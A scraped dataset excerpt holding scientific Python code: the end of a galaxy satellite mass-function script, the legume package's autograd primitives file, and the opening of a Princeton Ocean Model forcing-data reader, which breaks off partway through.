[smf_dist_tot, smf_dist_inf_tot, smf_dist_sup_tot, isolated_counts_tot])\n np.save(filename + '_bkg', [smf_dist_bkg_tot, smf_dist_bkg_inf_tot, smf_dist_bkg_sup_tot, isolated_counts_tot])\n np.save(filename + '_sat', [smf_dist_sat_tot, smf_dist_sat_inf_tot, smf_dist_sat_sup_tot, isolated_counts_tot])\n\n if not rel_scale:\n np.save(path + 'bin_edges', bin_edges)\n np.save(filename + '_cen', [smf_dist_cen_tot, isolated_counts_tot])\n else:\n np.save(path + 'bin_edges', rel_bin_edges)\n\n print('total number', round(sum(smf_dist_tot)))\n print('total number in bkg', round(sum(smf_dist_bkg_tot)))\n print('massive counts:', isolated_counts_tot)\n elif not save_results:\n print('isolated counts', isolated_counts_tot,'bkg counts', bkg_counts_tot)\n else:\n print(len(mass_cens_tot), isolated_counts_tot, 'Warning: wrong numbers! (Results not saved)')\n\n# calculations\nelse:\n cat_name = comm.recv(source=MPI.ANY_SOURCE)\n cat_gal = Table.read(catalog_path + 'v9_cats/'+cat_name+'_v9_gal_cut_params_sfq_added.fits') # read-in\n cat_gal = cat_gal[~np.isnan(cat_gal[zkeyname])]\n cat_gal = cat_gal[cat_gal[zkeyname] < 1.3]\n if cat_name == 'XMM-LSS_deep':\n cat_gal = cat_gal[cat_gal['inside_uS'] == True]\n else:\n cat_gal = cat_gal[cat_gal['inside_u'] == True]\n if 'inside_j' in path:\n cat = cat_gal[cat_gal['inside_j'] == True]\n cat_gal = cat_gal[cat_gal['MASK'] == 0] # unmasked\n cat_gal = cat_gal[cat_gal['OBJ_TYPE'] == 0] # galaxies\n cat_gal = cat_gal[cat_gal['MASS_MED'] > masscut_low]\n\n cat_random_points = Table(names=('RA', 'DEC', 'GAL_ID')) # to store position of selected random apertures\n print('=========rank=' + str(rank) + '======z=' + str(round(z, 1)) + '=========='+cat_name+'===')\n\n # bootstrap resampling\n smf_dist_arr = np.zeros(bin_number)\n smf_dist_bkg_arr = np.zeros(bin_number)\n mass_key_ori = cat_gal['MASS_MED'].copy()\n z_key_ori = cat_gal[zkeyname].copy()\n mass_centrals_ori = []\n isolated_counts_ori = 0\n count_bkg_ori = 0\n for boot_iter in range(boot_num):\n if boot_iter != 0:\n cat_gal['MASS_MED'] = mass_key_ori\n cat_gal[zkeyname] = z_key_ori\n scatter()\n boot_idx = bootstrap(np.arange(len(cat_gal)), bootnum=1)\n cat_gal_copy = cat_gal[boot_idx[0].astype(int)]\n else:\n cat_gal_copy = cat_gal\n\n # select massive galaxies\n cat_massive_gal = cat_gal_copy[cat_gal_copy['MASS_MED'] > masscut_host]\n cat_massive_z_slice = cat_massive_gal[abs(cat_massive_gal[zkeyname] - z) < z_bin_size]\n coord_massive_gal = SkyCoord(cat_massive_z_slice['RA'] * u.deg, cat_massive_z_slice['DEC'] * u.deg)\n\n # read in random point catalog\n cat_random = Table.read('/home/lejay/random_point_cat/' + cat_name + '_random_point.fits')\n cat_random = cat_random[cat_random['inside'] == 0]\n cat_random_nomask = np.copy(cat_random)\n cat_random = cat_random[cat_random['MASK'] != 0]\n cat_random_copy = np.copy(cat_random) # reset random points catalog at each redshift\n\n cat_random_points = Table(names=('RA', 'DEC', 'GAL_ID')) # to store position of selected random apertures\n isolated_counts = 0\n smf_dist = np.zeros(bin_number)\n smf_dist_bkg = np.zeros(bin_number)\n mass_centrals = []\n count_bkg = 0\n massive_count = 0\n print('massive gals:', len(cat_massive_z_slice))\n for gal in cat_massive_z_slice: # [np.random.randint(len(cat_massive_z_slice), size=300)]:\n massive_count += 1\n dis = WMAP9.angular_diameter_distance(gal[zkeyname]).value\n coord_gal = SkyCoord(gal['RA'] * u.deg, gal['DEC'] * u.deg)\n\n # prepare neighbors catalog\n cat_neighbors_z_slice = cat_gal_copy[abs(cat_gal_copy[zkeyname] - gal[zkeyname]) < sat_z_cut * 0.044 * (1 + gal[zkeyname])]\n cat_neighbors = cat_neighbors_z_slice[abs(cat_neighbors_z_slice['RA'] - gal['RA']) < r_iso / dis / np.pi * 180]\n cat_neighbors = cat_neighbors[abs(cat_neighbors['DEC'] - gal['DEC']) < r_iso / dis / np.pi * 180]\n\n # #### spatial selection\n if len(cat_neighbors) == 0: # central gals which has no companion\n continue\n\n else:\n # choose sats within r_high\n coord_neighbors = SkyCoord(cat_neighbors['RA'] * u.deg, cat_neighbors['DEC'] * u.deg)\n cat_neighbors = cat_neighbors[coord_neighbors.separation(coord_gal).degree < r_iso / dis / np.pi * 180]\n cat_neighbors = cat_neighbors[cat_neighbors['NUMBER'] != gal['NUMBER']]\n\n # isolation cut on central\n if len(cat_neighbors) == 0: # central gals which has no companion\n continue\n elif gal['MASS_MED'] < max(cat_neighbors['MASS_MED']): # no more-massive companions\n continue\n\n # choose sats within r_high\n coord_neighbors = SkyCoord(cat_neighbors['RA'] * u.deg, cat_neighbors['DEC'] * u.deg)\n cat_neighbors = cat_neighbors[coord_neighbors.separation(coord_gal).degree < r_high / dis / np.pi * 180]\n if len(cat_neighbors) == 0: # central gals which has no companion\n continue\n\n # exclude sats within r_low\n coord_neighbors = SkyCoord(cat_neighbors['RA'] * u.deg, cat_neighbors['DEC'] * u.deg)\n cat_neighbors = cat_neighbors[coord_neighbors.separation(coord_gal).degree > r_low / dis / np.pi * 180]\n if len(cat_neighbors) == 0: # central gals which has no companion\n continue\n\n # cut on central SF/Q\n if csfq == 'csf' and gal['sfProb_nuvrk'] < 0.5:\n continue\n elif csfq == 'cq' and gal['sfProb_nuvrk'] >= 0.5:\n continue\n\n # cut on companion sample (cut the final sample)\n cat_neighbors = cat_neighbors[cat_neighbors['MASS_MED'] > masscut_low]\n cat_neighbors = cat_neighbors[cat_neighbors['MASS_MED'] < masscut_high]\n mass_neighbors = cat_neighbors['MASS_MED']\n if len(cat_neighbors) == 0: # central gals which has no companion\n continue\n\n # Core Function: statistics #\n isolated_counts += 1\n mass_centrals.append(gal['MASS_MED'])\n if ssfq == 'all':\n sfq_weights = np.ones(len(cat_neighbors))\n elif ssfq == 'ssf':\n sfq_weights = cat_neighbors['sfProb_nuvrk']\n else:\n sfq_weights = 1 - cat_neighbors['sfProb_nuvrk']\n\n # absolute / relative mass scale\n sat_weights = np.array(sfq_weights/completeness_est(mass_neighbors, cat_neighbors['sfProb_nuvrk'], z))\n if not rel_scale:\n count_binned = np.histogram(mass_neighbors, weights=sat_weights, bins=bin_edges)[0]\n else:\n rel_mass_neighbors = mass_neighbors - gal['MASS_MED']\n count_binned = np.histogram(rel_mass_neighbors, weights=sat_weights, bins=rel_bin_edges)[0]\n\n sat_counts = np.array(count_binned, dtype='f8')\n smf_dist += sat_counts\n\n coord_random_list, sat_bkg, flag_bkg = bkg(cat_neighbors_z_slice, coord_massive_gal, gal['MASS_MED'])\n if flag_bkg == 0:\n cat_random = cut_random_cat(cat_random, coord_random_list)\n # sat_bkg, flag_bkg = bkg_2(cat_neighbors_z_slice, coord_massive_gal, gal['MASS_MED'])\n smf_dist_bkg += sat_bkg\n count_bkg += 1\n else:\n flag_bkg = 0\n\n # add results from this bootstrap iteration\n smf_dist_bkg = smf_dist_bkg / float(count_bkg) * isolated_counts\n smf_dist_arr = np.vstack((smf_dist_arr, smf_dist))\n smf_dist_bkg_arr = np.vstack((smf_dist_bkg_arr, smf_dist_bkg))\n if boot_iter == 0:\n mass_centrals_ori = mass_centrals\n isolated_counts_ori = isolated_counts\n count_bkg_ori = count_bkg\n\n # combine bootstrap results and calculate error\n smf_dist_arr = smf_dist_arr[1:]\n smf_dist_bkg_arr = smf_dist_bkg_arr[1:]\n smf_dist_sat_arr = smf_dist_arr - smf_dist_bkg_arr\n\n smf_dist_avg = np.average(smf_dist_arr, axis=0)\n smf_dist_bkg_avg = np.average(smf_dist_bkg_arr, axis=0)\n smf_dist_sat_avg = np.average(smf_dist_sat_arr, axis=0)\n\n smf_dist_inf = np.percentile(smf_dist_arr, 16, axis=0)\n smf_dist_bkg_inf = np.percentile(smf_dist_bkg_arr, 16, axis=0)\n smf_dist_sat_inf = np.percentile(smf_dist_sat_arr, 16, axis=0)\n\n smf_dist_sup = np.percentile(smf_dist_arr, 84, axis=0)\n smf_dist_bkg_sup = np.percentile(smf_dist_bkg_arr, 84, axis=0)\n smf_dist_sat_sup = np.percentile(smf_dist_sat_arr, 84, axis=0)\n\n smf_dist_avg_error = [smf_dist_avg, smf_dist_inf, smf_dist_sup]\n smf_dist_bkg_avg_error = [smf_dist_bkg_avg, smf_dist_bkg_inf, smf_dist_bkg_sup]\n smf_dist_sat_avg_error = [smf_dist_sat_avg, smf_dist_sat_inf, smf_dist_sat_sup]\n\n # cat_random_points.write('smf_random_points_' + cat_name + '_' + str(z) + '.fits', overwrite=True)\n comm.send((smf_dist_avg_error, smf_dist_bkg_avg_error, smf_dist_sat_avg_error, mass_centrals_ori, isolated_counts_ori, count_bkg_ori), dest=0)","repo_name":"LejayChen/massive_gals","sub_path":"CUT_deep_catalogs/test_smf/smf_deep_layer_cloud.py","file_name":"smf_deep_layer_cloud.py","file_ext":"py","file_size_in_byte":22823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"3206478342","text":"import numpy as np\nimport scipy.sparse as sp\nfrom functools import partial\nfrom .utils import toeplitz_block, get_value, fsolve, extend\n\nfrom autograd.extend import primitive, defvjp, vspace\nfrom autograd import grad, vector_jacobian_product\nimport autograd.numpy as npa\n\"\"\" Define here various primitives needed for the main code \nTo use with both numpy and autograd backends, define the autograd primitive of \na numpy function fnc as fnc_ag, and then define the vjp\"\"\"\n\n\ndef T(x):\n return np.swapaxes(x, -1, -2)\n\n\n\"\"\"=========== EXPAND ARRAY TO A GIVEN SHAPE =========== \"\"\"\n\n# extend(vals, inds, shape) makes an array of shape `shape` where indices\n# `inds` have values `vals`\nextend_ag = primitive(extend)\n\n\ndef vjp_maker_extend(ans, vals, inds, shape):\n def vjp(g):\n return g[inds]\n\n return vjp\n\n\ndefvjp(extend_ag, vjp_maker_extend, None, None)\n\"\"\"=========== NP.SQRT STABLE AROUND 0 =========== \"\"\"\nsqrt_ag = primitive(np.sqrt)\n\n\ndef vjp_maker_sqrt(ans, x):\n def vjp(g):\n return g * 0.5 * (x + 1e-10)**0.5 / (x + 1e-10)\n # return np.where(np.abs(x) > 1e-10, g * 0.5 * x**-0.5, 0.)\n\n return vjp\n\n\ndefvjp(sqrt_ag, vjp_maker_sqrt)\n\"\"\"=========== TOEPLITZ-BLOCK =========== \"\"\"\n\ntoeplitz_block_ag = primitive(toeplitz_block)\n\n\ndef vjp_maker_TB_T1(Tmat, n, T1, T2):\n \"\"\" Gives vjp for Tmat = toeplitz_block(n, T1, T2) w.r.t. T1\"\"\"\n def vjp(v):\n ntot = Tmat.shape[0]\n p = int(ntot / n) # Linear size of each block\n vjac = np.zeros(T1.shape, dtype=np.complex128)\n\n for ind1 in range(n):\n for ind2 in range(ind1, n):\n for indp in range(p):\n vjac[(ind2-ind1)*p:(ind2-ind1+1)*p-indp] += \\\n v[ind1*p + indp, ind2*p+indp:(ind2+1)*p]\n\n if ind2 > ind1:\n vjac[(ind2-ind1)*p:(ind2-ind1+1)*p-indp] += \\\n np.conj(v[ind2*p+indp:(ind2+1)*p, ind1*p + indp])\n return vjac\n\n return vjp\n\n\ndef vjp_maker_TB_T2(Tmat, n, T1, T2):\n \"\"\" Gives vjp for Tmat = toeplitz_block(n, T1, T2) w.r.t. T2\"\"\"\n def vjp(v):\n ntot = Tmat.shape[0]\n p = int(ntot / n) # Linear size of each block\n vjac = np.zeros(T2.shape, dtype=np.complex128)\n\n for ind1 in range(n):\n for ind2 in range(ind1, n):\n for indp in range(p):\n vjac[(ind2-ind1)*p+1:(ind2-ind1+1)*p-indp] += \\\n v[ind1*p+indp+1:(ind1+1)*p, ind2*p+indp]\n\n if ind2 > ind1:\n vjac[(ind2-ind1)*p+1:(ind2-ind1+1)*p-indp] += \\\n np.conj(v[ind2*p+indp, ind1*p+indp+1:(ind1+1)*p])\n return vjac\n\n return vjp\n\n\ndefvjp(toeplitz_block_ag, None, vjp_maker_TB_T1, vjp_maker_TB_T2)\n\"\"\"=========== NUMPY.LINALG.EIGH =========== \"\"\"\n\neigh_ag = primitive(np.linalg.eigh)\n\n\ndef vjp_maker_eigh(ans, x, UPLO='L'):\n \"\"\"Gradient for eigenvalues and vectors of a hermitian matrix.\"\"\"\n N = x.shape[-1]\n w, v = ans # Eigenvalues, eigenvectors.\n vc = np.conj(v)\n\n def vjp(g):\n wg, vg = g # Gradient w.r.t. eigenvalues, eigenvectors.\n w_repeated = np.repeat(w[:, np.newaxis], N, axis=-1)\n\n # Eigenvalue part\n vjp_temp = np.dot(vc * wg[np.newaxis, :], T(v))\n\n # Add eigenvector part only if non-zero backward signal is present.\n # This can avoid NaN results for degenerate cases if the function\n # depends on the eigenvalues only.\n if np.any(vg):\n off_diag = np.ones((N, N)) - np.eye(N)\n F = off_diag / (T(w_repeated) - w_repeated + np.eye(N))\n vjp_temp += np.dot(np.dot(vc, F * np.dot(T(v), vg)), T(v))\n\n # eigh always uses only the lower or the upper part of the matrix\n # we also have to make sure broadcasting works\n reps = np.array(x.shape)\n reps[-2:] = 1\n\n if UPLO == 'L':\n tri = np.tile(np.tril(np.ones(N), -1), reps)\n elif UPLO == 'U':\n tri = np.tile(np.triu(np.ones(N), 1), reps)\n\n return np.real(vjp_temp)*np.eye(vjp_temp.shape[-1]) + \\\n (vjp_temp + np.conj(T(vjp_temp))) * tri\n\n return vjp\n\n\ndefvjp(eigh_ag, vjp_maker_eigh)\n\"\"\"=========== MATRIX INVERSE =========== \"\"\"\n\"\"\"We define this here without the `einsum` notation that's used in autograd.\n`einsum` allows broadcasting (which we don't care about), but is slower \n(which we do)\n\"\"\"\n\ninv_ag = primitive(np.linalg.inv)\n\n\ndef vjp_maker_inv(ans, x):\n return lambda g: -np.dot(np.dot(T(ans), g), T(ans))\n\n\ndefvjp(inv_ag, vjp_maker_inv)\n\"\"\"=========== SCIPY.SPARSE.LINALG.EIGSH =========== \"\"\"\n\neigsh_ag = primitive(sp.linalg.eigsh)\n\n# def vjp_maker_eigsh(ans, x, **kwargs):\n# \"\"\"Gradient for eigenvalues and vectors of a hermitian matrix.\"\"\"\n# numeig = kwargs['k']\n# N = x.shape[-1]\n# w, v = ans # Eigenvalues, eigenvectors.\n# vc = np.conj(v)\n\n# def vjp(g):\n# wg, vg = g # Gradient w.r.t. eigenvalues, eigenvectors.\n# w_repeated = np.repeat(w[..., np.newaxis], numeig, axis=-1)\n\n# # Eigenvalue part\n# vjp_temp = np.dot(vc * wg[..., np.newaxis, :], T(v))\n\n# # Add eigenvector part only if non-zero backward signal is present.\n# # This can avoid NaN results for degenerate cases if the function\n# # depends on the eigenvalues only.\n# if np.any(vg):\n# off_diag = np.ones((numeig, numeig)) - np.eye(numeig)\n# F = off_diag / (T(w_repeated) - w_repeated + np.eye(numeig))\n# vjp_temp += np.dot(np.dot(vc, F * np.dot(T(v), vg)), T(v))\n\n# return vjp_temp\n\n# return vjp\n\n\ndef vjp_maker_eigsh(ans, mat, **kwargs):\n \"\"\"Steven Johnson method extended to a Hermitian matrix\n https://math.mit.edu/~stevenj/18.336/adjoint.pdf\n \"\"\"\n numeig = kwargs['k']\n N = mat.shape[0]\n\n def vjp(g):\n vjp_temp = np.zeros_like(mat)\n for iv in range(numeig):\n a = ans[0][iv]\n v = ans[1][:, iv]\n vc = np.conj(v)\n ag = g[0][iv]\n vg = g[1][:, iv]\n\n # Eigenvalue part\n vjp_temp += ag * np.outer(vc, v)\n\n # Add eigenvector part only if non-zero backward signal is present.\n # This can avoid NaN results for degenerate cases if the function\n # depends on the eigenvalues only.\n if np.any(vg):\n # Projection operator on space orthogonal to v\n P = np.eye(N, N) - np.outer(vc, v)\n Amat = T(mat - a * np.eye(N, N))\n b = P.dot(vg)\n\n # Initial guess orthogonal to v\n v0 = P.dot(np.random.randn(N))\n\n # Find a solution lambda_0 using conjugate gradient\n (l0, _) = sp.linalg.cg(Amat, b, x0=v0, atol=0)\n # Project to correct for round-off errors\n l0 = P.dot(l0)\n\n vjp_temp -= np.outer(l0, v)\n\n return vjp_temp\n\n return vjp\n\n\ndefvjp(eigsh_ag, vjp_maker_eigsh)\n\"\"\"=========== NUMPY.INTERP =========== \"\"\"\n\"\"\"This implementation might not be covering the full scope of the numpy.interp\nfunction, but it covers everything we need\n\"\"\"\n\ninterp_ag = primitive(np.interp)\n\n\ndef vjp_maker_interp(ans, x, xp, yp):\n \"\"\"Construct the vjp of interp(x, xp, yp) w.r.t. yp\n \"\"\"\n def vjp(g):\n dydyp = np.zeros((x.size, xp.size))\n for ix in range(x.size):\n indx = np.searchsorted(xp, x[ix]) - 1\n dydyp[ix,\n indx] = 1 - (x[ix] - xp[indx]) / (xp[indx + 1] - xp[indx])\n dydyp[ix,\n indx + 1] = (x[ix] - xp[indx]) / (xp[indx + 1] - xp[indx])\n return np.dot(g, dydyp)\n\n return vjp\n\n\ndefvjp(interp_ag, None, None, vjp_maker_interp)\n\"\"\"=========== SOLVE OF f(x, y) = 0 W.R.T. X =========== \"\"\"\nfsolve_ag = primitive(fsolve)\n\"\"\"fsolve_ag(fun, lb, ub, *args) solves fun(x, *args) = 0 for lb <= x <= ub\n x and the output of fun are both scalar\n args can be anything\n\"\"\"\n\n\ndef vjp_factory_fsolve(ginds):\n \"\"\"\n Factory function defining the vjp_makers for a generic fsolve_ag with \n multiple extra arguments\n\n Output: a list of vjp_makers for backproping through dx/darg where x is \n found through fsolve_ag and arg is one of the function args. \n Input: \n - ginds : Boolean list defining which args will be differentiated.\n grad(f, gind) must exist for all gind==True in ginds\n grad(f, 0), i.e. the gradient w.r.t. x, must also exist\n \"\"\"\n\n # Gradients w.r.t fun, lb and ub are not computed\n vjp_makers = [None, None, None]\n\n def vjp_single_arg(ia):\n def vjp_maker(ans, *args):\n f = args[0]\n fargs = args[3:]\n dfdx = grad(f, 0)(ans, *fargs)\n dfdy = grad(f, ia + 1)(ans, *fargs)\n\n def vjp(g):\n return np.dot(g, -1 / dfdx * dfdy)\n\n return vjp\n\n return vjp_maker\n\n for (ia, gind) in enumerate(ginds):\n if gind == True:\n vjp_makers.append(vjp_single_arg(ia=ia))\n else:\n vjp_makers.append(None)\n\n return tuple(vjp_makers)\n\n\n# NB: This definition is for the specific fsolve with three arguments\n# used for the guided modes!!!\ndefvjp(fsolve_ag, *vjp_factory_fsolve([False, True, True]))\n\"\"\"=========== MAP FUNCTION EVALUATION =========== \"\"\"\n\"\"\" A variation of the `functools.map` function applied to a list of functions,\n defined as follows\n `fmap(fns, params) = map(lambda f: f(params), fns)`\n (the output is converted to a numpy array)\n\n We assume that each `f` in `fns` returns a scalar such that the output is an \n array of the same size as `fns`.\n\"\"\"\n\n\n@primitive\ndef fmap(fns, params):\n \"\"\" autograd-ready version of functools.fmap applied to a list of functions\n `fns` taking the same parmeters `params`\n Arguments:\n `fns`: list of functions of `params` that return a scalar\n `params`: array of parameters feeding into each individual computation\n Returns:\n Numpy array of same size as the `fns` list\n \"\"\"\n\n # use standard map function and convert to a Numpy array\n return np.array(list(map(lambda f: f(params), fns))).ravel()\n\n\ndef vjp_maker_fmap(ans, fns, params):\n # get the gradient of each function and stack along the 0-th dimension\n grads = np.stack(list(map(lambda f: grad(f)(params), fns)), axis=0)\n # this literally does the vector-jacobian product\n return lambda v: np.dot(v.T, grads)\n\n\ndefvjp(fmap, None, vjp_maker_fmap)\n","repo_name":"fancompute/legume","sub_path":"legume/primitives.py","file_name":"primitives.py","file_ext":"py","file_size_in_byte":10556,"program_lang":"python","lang":"en","doc_type":"code","stars":80,"dataset":"github-code","pt":"43"} +{"seq_id":"38893269172","text":"# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n# MODEL POM - Princeton Ocean Model\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\nimport numpy as np\nfrom os import path\nfrom cppdefs import *\nfrom inputs import params_POMBFM\nfrom inputs.namelist_input_data import phyto_input, zoop_input, poc_input, doc_input, phos_input, nit_input, am_input, oxy_input\nfrom pom.constants import current_path, seconds_per_day, vertical_layers\n\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n#\n# SUBROUTINE: read_pom_input\n#\n# DESCRIPTION: Opens forcing files reading path specified in pom_input nml.\n# (formerly opendat)\n#\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\ndef read_pom_input():\n\n \"\"\"\n Description: Opens forcing files reading the paths specified in the pom_input namelist.\n\n :return: data arrays for wind stress, surface salinity, solar radiation, inorganic\n suspended matter, salinity and temperature vertical profiles, general circulation\n for w velocity, intermediate eddy velocities, salinity and temperature initial\n conditions, heat flux loss, and surface and bottom nutrients\n \"\"\"\n\n # PATHS TO INPUT DATA FILES\n wind_stress_data_path = current_path + '/inputs/POM_BFM17/monthly_surf_wind_stress_bermuda_killworth2.da'\n surface_salinity_data_path = current_path + '/inputs/POM_BFM17/monthly_surf_salt_bermuda_150m_killworth2.da'\n shortwave_solar_radiation_data_path = current_path + '/inputs/POM_BFM17/monthly_surf_qs_bermuda_killworth2.da'\n inorganic_suspended_matter_data_path = current_path + '/inputs/POM_BFM17/monthly_clima_ISM_150m_bermuda_killworth.da'\n salinity_vertical_profile_data_path = current_path + '/inputs/POM_BFM17/monthly_clima_salt_150m_bermuda_killworth2.da'\n temperature_vertical_profile_data_path = current_path + '/inputs/POM_BFM17/monthly_clima_temp_150m_bermuda_killworth2.da'\n general_circulation_w_velocity_data_path = current_path + '/inputs/POM_BFM17/monthly_clima_w_150m_bermuda_ekman.da'\n intermediate_eddy_w_velocity_1_data_path = current_path + '/inputs/POM_BFM17/bimonthly_random_eddy_w_150m_bermuda_norm1.da'\n intermediate_eddy_w_velocity_2_data_path = current_path + '/inputs/POM_BFM17/bimonthly_random_eddy_w_150m_bermuda_norm2.da'\n salinity_initial_conditions_data_path = current_path + '/inputs/POM_BFM17/init_prof_S_150m_bermuda_killworth2.da'\n temperature_initial_conditions_data_path = current_path + '/inputs/POM_BFM17/init_prof_T_150m_bermuda_killworth2.da'\n heat_flux_loss_data_path = current_path + '/inputs/POM_BFM17/monthly_surf_rad_bermuda_killworth2.da'\n surface_nutrients_data_path = current_path + '/inputs/POM_BFM17/NutrientsARPAOGS.da'\n bottom_nutrients_data_path = current_path + '/inputs/POM_BFM17/monthly_bott_nut_bermuda_150m_killworth.da'\n\n # LENGTH OF INPUT ARRAYS\n array_length = 13 # MONTHS (D-J-F-M-A-M-J-J-A-S-O-N-D)\n\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n # WIND SPEED (u,v)\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n if path.exists(wind_stress_data_path):\n wind_speed_data = np.fromfile(wind_stress_data_path)\n wind_speed_zonal = np.zeros(array_length)\n wind_speed_meridional = np.zeros(array_length)\n for i in range(0,array_length):\n wind_speed_zonal[i] = wind_speed_data[2*i + 0]\n wind_speed_meridional[i] = wind_speed_data[2*i + 1]\n\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n # SURFACE SALINITY\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n if path.exists(surface_salinity_data_path):\n surface_salinity = np.fromfile(surface_salinity_data_path)\n\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n # RADIANCE\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n if path.exists(shortwave_solar_radiation_data_path):\n solar_radiation = np.fromfile(shortwave_solar_radiation_data_path)\n\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n # INORGANIC SUSPENDED MATTER\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n if path.exists(inorganic_suspended_matter_data_path):\n inorganic_suspended_matter_data = np.fromfile(inorganic_suspended_matter_data_path)\n inorganic_suspended_matter = np.zeros((vertical_layers,array_length))\n for i in range(0,array_length):\n for x in range(0, vertical_layers):\n inorganic_suspended_matter[x,i] = inorganic_suspended_matter_data[vertical_layers * i + x]\n\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n # SALINITY CLIMATOLOGY (DIAGNOSTIC MODE)\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n if path.exists(salinity_vertical_profile_data_path):\n salinity_vertical_profile_data = np.fromfile(salinity_vertical_profile_data_path)\n salinity_climatology = np.zeros((vertical_layers,array_length))\n for i in range(0,array_length):\n for x in range(0, vertical_layers):\n salinity_climatology[x,i] = salinity_vertical_profile_data[vertical_layers * i + x]\n\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n # TEMPERATURE CLIMATOLOGY (DIAGNOSTIC MODE)\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n if path.exists(temperature_vertical_profile_data_path):\n temperature_vertical_profile_data = np.fromfile(temperature_vertical_profile_data_path)\n temperature_climatology = np.zeros((vertical_layers,array_length))\n for i in range(0,array_length):\n for x in range(0, vertical_layers):\n temperature_climatology[x,i] = temperature_vertical_profile_data[vertical_layers * i + x]\n\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n # GENERAL CIRCULATION W VELOITY CLIMATOLOGY\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n if path.exists(general_circulation_w_velocity_data_path):\n general_circulation_w_velocity_data = np.fromfile(general_circulation_w_velocity_data_path)\n w_velocity_climatology = np.zeros((vertical_layers,array_length))\n for i in range(0,array_length):\n for x in range(0, vertical_layers):\n w_velocity_climatology[x,i] = general_circulation_w_velocity_data[vertical_layers * i + x]\n\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n # INTERMITTANT EDDY W VELOCITY 1\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n if path.exists(intermediate_eddy_w_velocity_1_data_path):\n 